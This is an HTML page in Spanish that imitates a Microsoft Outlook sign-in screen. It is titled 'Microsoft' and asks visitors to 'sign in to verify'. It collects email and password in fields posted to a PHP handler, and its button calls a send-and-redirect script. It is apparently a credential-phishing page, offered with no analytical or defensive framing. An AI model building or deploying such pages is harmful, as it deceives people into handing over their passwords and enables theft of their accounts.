<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Microsoft</title>
  <style>
    body {
      display: flex;
      justify-content: left
    }

    .container {
      width: 300px;
      background-color: #fff;
      border: 2px solid #ffffff;
      padding: 20px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }

    .header {
      text-align: center;
      margin-bottom: 20px;
    }

    .header img {
      width: 150px; /* Ajusta el tamaño de la imagen según sea necesario */
      height: auto;
    }

    .form-group {
      margin-bottom: 15px;
    }

    label {
      display: block;
      margin-bottom: 5px;
    }

    input {
      width: 100%;
      padding: 8px;
      box-sizing: border-box;
    }

    button {
      background-color: #1575eb;
      color: #fff;
      padding: 10px;
      border: none;
      cursor: pointer;
      width: 100%;
    }

    button:hover {
      background-color: lch(from color l c h);
    }
  </style>
</head>
<body>

  <div class="container">
    <div class="header">
      <img src="c:\Users\suare\OneDrive\Imágenes\Capturas de pantalla\Captura de pantalla 2024-01-02 235140.png" alt="Logo">
   <br>
      <p style="text-align: left;">Inicie sesion para comprobar<br>Continuar en Outlook</p>
  
    <form action="procesar_formulario.php" method="post">
      <div class="form-group">
        <input type="email" id="email" name="email" required placeholder="Correo electronico"><br> <br>
      </div>

      <div class="form-group">
        <input type="password" id="password" name="password" required placeholder="Contraseña"> <br> <br>
      </div>
      <button type="button" name="wf" onclick="Enviaryredirigir()">Siguiente</button>
      <br><br>
<br><br><br><br><br>
<input type="button" value="Opciones de inicio de Sesion" > 
      <h6 style="font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;">Terminos de uso © <br>Derechos reservados</h6>
    </form>
  </div>
  <script src="app.js"></script>
</body>
</html>
